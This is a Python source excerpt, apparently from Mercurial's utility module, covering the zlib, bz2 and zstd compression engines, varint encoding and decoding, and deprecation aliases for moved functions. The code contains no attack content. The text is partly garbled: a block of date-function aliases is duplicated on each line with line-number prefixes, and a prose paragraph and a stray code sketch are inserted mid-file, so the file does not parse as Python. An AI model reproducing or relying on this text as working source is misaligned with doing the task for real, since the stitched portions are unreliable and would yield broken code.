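    assert 'identity-example' in compengines
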
class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

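# Illustrative sketch (not part of the original module): a compress/decompress
# round trip through an engine looked up by its bundle name.
def _examplecompressroundtrip():
    from io import BytesIO
    engine = compengines.forbundlename('gzip')
    compressed = ''.join(engine.compressstream(iter(['some ', 'data'])))
    reader = engine.decompressorreader(BytesIO(compressed))
    assert reader.read(9) == 'some data'
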
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7

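# Illustrative sketch (not part of the original module): uvarintencode() and
# uvarintdecodestream() round-trip any non-negative integer.
def _exampleuvarintroundtrip():
    from io import BytesIO
    for value in (0, 1, 127, 128, 1337, 2 ** 32):
        assert uvarintdecodestream(BytesIO(uvarintencode(value))) == value
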
###
# Deprecation warnings for util.py splitting
###

def _deprecatedfunc(func, version, modname=None):
    def wrapped(*args, **kwargs):
        fn = pycompat.sysbytes(func.__name__)
        mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
        msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
        nouideprecwarn(msg, version, stacklevel=2)
        return func(*args, **kwargs)
    wrapped.__name__ = func.__name__
    return wrapped

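# Illustrative sketch (not part of the original module): a wrapped function
# warns on each call and then forwards its arguments. With stacklevel=2 the
# DeprecationWarning points at the caller of the alias, not at wrapped().
def _exampledeprecatedfunc():
    md = _deprecatedfunc(dateutil.makedate, '4.6')
    # emits: 'util.makedate' is deprecated, use 'utils.dateutil.makedate'
    return md()
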
3789 defaultdateformats = dateutil.defaultdateformats
3789 defaultdateformats = dateutil.defaultdateformats
3790 extendeddateformats = dateutil.extendeddateformats
3790 extendeddateformats = dateutil.extendeddateformats
3791 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3791 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3792 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3792 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3793 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3793 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3794 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3794 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3795 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3795 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3796 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3796 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3797 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3797 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3798
3798
stderr = procutil.stderr
stdin = procutil.stdin
stdout = procutil.stdout
explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
                              modname='utils.procutil')
findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
                             modname='utils.procutil')
popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
                               modname='utils.procutil')
readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
                                   modname='utils.procutil')
shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
                             modname='utils.procutil')
shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
                             modname='utils.procutil')
spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
                                modname='utils.procutil')
sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
try:
    setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
                                  modname='utils.procutil')
except AttributeError:
    pass
try:
    unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
                                    modname='utils.procutil')
except AttributeError:
    pass
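The try/except AttributeError guards exist because procutil defines setprocname and unblocksignal only where the platform supports them; importing util must not fail elsewhere. An equivalent guarded-aliasing sketch using getattr (hypothetical variable name, shown only to illustrate the pattern):

    # probing with a default avoids the try/except entirely;
    # None means the attribute is absent on this platform
    _setprocname = getattr(procutil, 'setprocname', None)
    if _setprocname is not None:
        setprocname = _deprecatedfunc(_setprocname, '4.6',
                                      modname='utils.procutil')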
closefds = procutil.closefds
isatty = _deprecatedfunc(procutil.isatty, '4.6')
popen2 = _deprecatedfunc(procutil.popen2, '4.6')
popen3 = _deprecatedfunc(procutil.popen3, '4.6')
popen4 = _deprecatedfunc(procutil.popen4, '4.6')
pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
filter = _deprecatedfunc(procutil.filter, '4.6')
mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
system = _deprecatedfunc(procutil.system, '4.6')
gui = _deprecatedfunc(procutil.gui, '4.6')
hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
rundetached = _deprecatedfunc(procutil.rundetached, '4.6')

binary = _deprecatedfunc(stringutil.binary, '4.6')
stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
email = _deprecatedfunc(stringutil.email, '4.6')
ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
wrap = _deprecatedfunc(stringutil.wrap, '4.6')
parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')